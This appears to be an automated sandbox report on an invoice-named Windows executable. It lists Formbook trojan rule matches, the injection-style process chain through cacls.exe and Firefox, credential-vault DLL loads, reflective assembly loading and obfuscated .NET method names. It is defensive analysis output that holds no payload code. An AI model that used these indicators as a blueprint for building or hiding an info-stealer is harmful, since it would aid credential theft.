Source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: FACTURA 24V70 VINS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, IqK8bsYVEt7haTtUqc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, IqK8bsYVEt7haTtUqc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, IqK8bsYVEt7haTtUqc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/7

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FACTURA 24V70 VINS.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process created: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process created: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	.Net Code: ql8dGRb77A System.Reflection.Assembly.Load(byte[])
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	.Net Code: ql8dGRb77A System.Reflection.Assembly.Load(byte[])
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	.Net Code: ql8dGRb77A System.Reflection.Assembly.Load(byte[])
Source: 1.2.FACTURA 24V70 VINS.exe.74e0000.2.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E3739 push 0C05h; iretd	1_2_056E3745
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EEE43 push es; retf	1_2_056EEE4A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EFB57 push cs; retf	1_2_056EFB5A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EFB11 push cs; retf	1_2_056EFB12
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EFACB push cs; retf	1_2_056EFAD2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076048D0 push eax; iretd	1_2_076048D1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626769 push esp; retf	1_2_0762676A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07623723 push eax; retf	1_2_07623729
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076266FB push ebx; retf	1_2_07626702
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0762754B pushad ; retf	1_2_07627552
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07627549 pushad ; retf	1_2_0762754A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076285CB push eax; retf	1_2_076285D1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626583 push eax; retf	1_2_0762658A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626581 push eax; retf	1_2_07626582
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076264B8 push eax; retf	1_2_076264BA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0762F1CB pushfd ; retf	1_2_0762F1D2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0762F1C9 pushfd ; retf	1_2_0762F1CA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620FE1 push ds; retf	1_2_07620FE2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620FFB push ds; retf	1_2_07621002
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620E53 push ds; retf	1_2_07620E5A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620E50 push ds; retf	1_2_07620E52
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620EF9 push ds; retf	1_2_07620EFA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626D03 push edi; retf	1_2_07626D0A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626D00 push edi; retf	1_2_07626D02
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626C20 push esi; retf	1_2_07626C22
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07622C38 pushad ; retf	1_2_07622C39
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626BB0 push esi; retf	1_2_07626BB2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626A71 push ebp; retf	1_2_07626A72
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626AB3 push ebp; retf	1_2_07626ABA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626AB1 push esi; retf	1_2_07626AB2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626A90 push ebp; retf	1_2_07626A92

Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, UcUWFu8W6ceNysrd4I.cs	High entropy of concatenated method names: 'YnaGGmBZ4', 'M8axDFF9O', 'BedujmrMZ', 'aBUAjXwI5', 'WTU7JTVGf', 'jUIvRjPL4', 'bXo48bPw3lANkaUnUo', 'A7ReepZ7pUtf0ITppJ', 'RhiMlkIFD', 'MXKoPdY6w'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, qyf5abrvsyY6ONiZon.cs	High entropy of concatenated method names: 'Ttbc5t2tFW', 'ungcS0WG6G', 'yZFcd9GBQ5', 'VYQcJ6JClo', 'o7oc8tWrlE', 'OWWcyF8V59', 'x8qcO60Pa5', 'RHpM07lkLR', 'ST3MmB6mHF', 'qNIMDl2rJU'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, LqaaTDCXXcs1Bkatoc.cs	High entropy of concatenated method names: 'KRPMVHggqf', 'f4EMiN41Xv', 'iGsM3cYMUJ', 'eiPMQlMf8p', 'xBNMj8aOEd', 'hZvMaIQGmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, tLsmDfm2sEXvEoepHD.cs	High entropy of concatenated method names: 'icUOgwaEkH', 'KIvOT0kRFd', 'g7VOG13hlW', 'TPPOxdx46W', 'XZ3Ou1PC0t', 'vbFOATYUXc', 'DTJO7Emecd', 'yEKOv4ZfB0', 'YHCP9M5i5fkUj6QwpSe', 'EPPgvx5HRs9BjQGiGlP'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, HRqAi5zo58cVIJcpge.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vY5c4EJ1CB', 'Hv4cwTYwY2', 'rj9c6totx1', 'oPIclRD4tj', 'w6AcMO9OWE', 'tC4ccrZBEG', 'UoOcoxtZCx'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, IqK8bsYVEt7haTtUqc.cs	High entropy of concatenated method names: 'PeU8j4GV4l', 'q9c8nild0U', 'tCD8NMVWDs', 'dGe8WJPKGb', 'Jds8eX6cXh', 'uEL8R6frcH', 'WLJ80Gh8Y0', 'mg28mYsYG3', 'Qbj8DecTBB', 'cKv8EGOI33'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, TOsVUbRsuCOcpGkcfD.cs	High entropy of concatenated method names: 'F8Ewk1Pgpo', 'XufwBSxkFG', 'erCwjytQXa', 'VL9wn8UV5V', 'lMRwiGYBWF', 'GXpw36PXP0', 'gr8wQsU9he', 'dWiwao1yuE', 'ohJwUA8uGy', 'KabwFwp2NC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, lmy47KswpkjG5DQ3SN.cs	High entropy of concatenated method names: 'Dispose', 'jMJ5DG8n9i', 'TS1qi2822s', 'TQ0XXOnXYg', 'gUF5EV97RQ', 'GOt5zrVj8F', 'ProcessDialogKey', 'H8wq9SmPRh', 'x1kq5qeofQ', 'yETqqSYqU6'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, mPWDn6SsOiw3DbUmrS.cs	High entropy of concatenated method names: 'p74MJayRl6', 'ttZM8gsUDY', 'yKrMr6svkE', 'uWrMyQYKjh', 'vPSMOgMwlE', 'z0PMZISj5A', 'JKFMbRRnhm', 'cL1MCqms5B', 'JKcM1a2o1n', 'SrTMPJGVhC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, aVKKOBMHnAN631LZaN.cs	High entropy of concatenated method names: 'TGhZJDmURb', 'A2RZrsZJK0', 'bPJZOk4pBm', 'dOgOEPLCXk', 'eEWOzOKKuM', 'exmZ94M670', 'ofCZ5NmQv1', 'v6qZquuEDb', 'ebtZSRK0fk', 'BkHZd1qERJ'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	High entropy of concatenated method names: 'SGDSLNWPCw', 'MSqSJpCI7o', 'tNpS8ITiTd', 'lNpSrDcBfH', 'BmgSy6xAQH', 'PL8SOtqvFZ', 'O9RSZEDZmC', 'JSCSbDslg6', 'N6wSCZr80t', 'LOOS1Y6hbo'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, Ep1iiUPZ9eVGuMqeAM.cs	High entropy of concatenated method names: 'BuWZTqlpUN', 'uyhZIRqvTm', 'xPxZGuMh3x', 'RpQZx5GpYx', 'CoNZs2Pr1y', 'UsHZulDhgV', 'jwNZARYJpP', 'Ww0ZY0DcYN', 'wrQZ782ula', 'tVFZvW1jRM'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, pRe6iEGYFy6rjPN2Fu.cs	High entropy of concatenated method names: 'C255ZsZSyo', 'yhF5bllatY', 'T9F518kZ7R', 'Lwy5Pj7u9s', 'H5x5wgda6G', 'bHR56qGElK', 'xcZX0Ru7XAOohVQfbR', 'UKa7YY3DanpgBMFBRZ', 'iUj55dhNhO', 'mUC5SlowUt'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, qDR1nokqdRKXT55LttR.cs	High entropy of concatenated method names: 'lj1cTPg7HP', 'JjFcInq3ix', 'Sl9cGNFE3i', 'TidcxjaA65', 'EYacsjGkRM', 'GDvcu1ajok', 'Hm0cAvlT5Q', 'opacY5Fib6', 'zvOc7EcHuK', 'd8ZcvC4xfH'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, cOTBnJXWhHoN3L5kKB.cs	High entropy of concatenated method names: 'k5vrxwNUyb', 'xOlruHfxc6', 'uB7rYVURmW', 'OWlr73BrZH', 'XuTrw3uZan', 'y2Gr6PKRcy', 'VRjrl7oMZZ', 'peDrM3mbj8', 'aPYrcvADSF', 'dWAroDIPwy'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, fy8m61vnZRqwT5qopV.cs	High entropy of concatenated method names: 'ToString', 'wSV6hws7K0', 'YPM6iItO4n', 'y9563Lh7nt', 'Jae6QfNrxe', 'T8Y6aBoqe3', 'trD6UppuJZ', 'BFS6FH6Cgy', 'g9V6Kk2Ut1', 'JqD6pHKLhu'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, i2sRDQQLDPWO0A5Knr.cs	High entropy of concatenated method names: 'pkq4YFu08A', 'jWi47LwPGY', 'e8N4VUp8y8', 'JPy4iutZy0', 'znE4QI6VGJ', 'YYM4aDYuvb', 'o9S4FL44dL', 'oC24K33JtO', 'esU4kx2lxu', 'TgQ4h261We'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, rdjnA5kHW6FVW1v22F5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WjIojideG0', 'PYtontZNTy', 'p1SoNKlMH3', 'qsUoWeWVuT', 'G2KoeiZKAY', 'Eb9oRuptvr', 'QRdo0uIdfK'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uP28d87bb3JInt4slZ.cs	High entropy of concatenated method names: 'iFiOLEkFbu', 'FowO8oxcmm', 'zTUOyyggSY', 'D3EOZi4XJE', 'UBlObZJK4g', 'MdNyeaZGBo', 'D8XyRfTBBQ', 'VQhy027nKb', 'qdKymNrSge', 'Xg5yDu0yUP'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, UcUWFu8W6ceNysrd4I.cs	High entropy of concatenated method names: 'YnaGGmBZ4', 'M8axDFF9O', 'BedujmrMZ', 'aBUAjXwI5', 'WTU7JTVGf', 'jUIvRjPL4', 'bXo48bPw3lANkaUnUo', 'A7ReepZ7pUtf0ITppJ', 'RhiMlkIFD', 'MXKoPdY6w'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, qyf5abrvsyY6ONiZon.cs	High entropy of concatenated method names: 'Ttbc5t2tFW', 'ungcS0WG6G', 'yZFcd9GBQ5', 'VYQcJ6JClo', 'o7oc8tWrlE', 'OWWcyF8V59', 'x8qcO60Pa5', 'RHpM07lkLR', 'ST3MmB6mHF', 'qNIMDl2rJU'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, LqaaTDCXXcs1Bkatoc.cs	High entropy of concatenated method names: 'KRPMVHggqf', 'f4EMiN41Xv', 'iGsM3cYMUJ', 'eiPMQlMf8p', 'xBNMj8aOEd', 'hZvMaIQGmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, tLsmDfm2sEXvEoepHD.cs	High entropy of concatenated method names: 'icUOgwaEkH', 'KIvOT0kRFd', 'g7VOG13hlW', 'TPPOxdx46W', 'XZ3Ou1PC0t', 'vbFOATYUXc', 'DTJO7Emecd', 'yEKOv4ZfB0', 'YHCP9M5i5fkUj6QwpSe', 'EPPgvx5HRs9BjQGiGlP'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, HRqAi5zo58cVIJcpge.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vY5c4EJ1CB', 'Hv4cwTYwY2', 'rj9c6totx1', 'oPIclRD4tj', 'w6AcMO9OWE', 'tC4ccrZBEG', 'UoOcoxtZCx'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, IqK8bsYVEt7haTtUqc.cs	High entropy of concatenated method names: 'PeU8j4GV4l', 'q9c8nild0U', 'tCD8NMVWDs', 'dGe8WJPKGb', 'Jds8eX6cXh', 'uEL8R6frcH', 'WLJ80Gh8Y0', 'mg28mYsYG3', 'Qbj8DecTBB', 'cKv8EGOI33'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, TOsVUbRsuCOcpGkcfD.cs	High entropy of concatenated method names: 'F8Ewk1Pgpo', 'XufwBSxkFG', 'erCwjytQXa', 'VL9wn8UV5V', 'lMRwiGYBWF', 'GXpw36PXP0', 'gr8wQsU9he', 'dWiwao1yuE', 'ohJwUA8uGy', 'KabwFwp2NC'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, lmy47KswpkjG5DQ3SN.cs	High entropy of concatenated method names: 'Dispose', 'jMJ5DG8n9i', 'TS1qi2822s', 'TQ0XXOnXYg', 'gUF5EV97RQ', 'GOt5zrVj8F', 'ProcessDialogKey', 'H8wq9SmPRh', 'x1kq5qeofQ', 'yETqqSYqU6'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, mPWDn6SsOiw3DbUmrS.cs	High entropy of concatenated method names: 'p74MJayRl6', 'ttZM8gsUDY', 'yKrMr6svkE', 'uWrMyQYKjh', 'vPSMOgMwlE', 'z0PMZISj5A', 'JKFMbRRnhm', 'cL1MCqms5B', 'JKcM1a2o1n', 'SrTMPJGVhC'
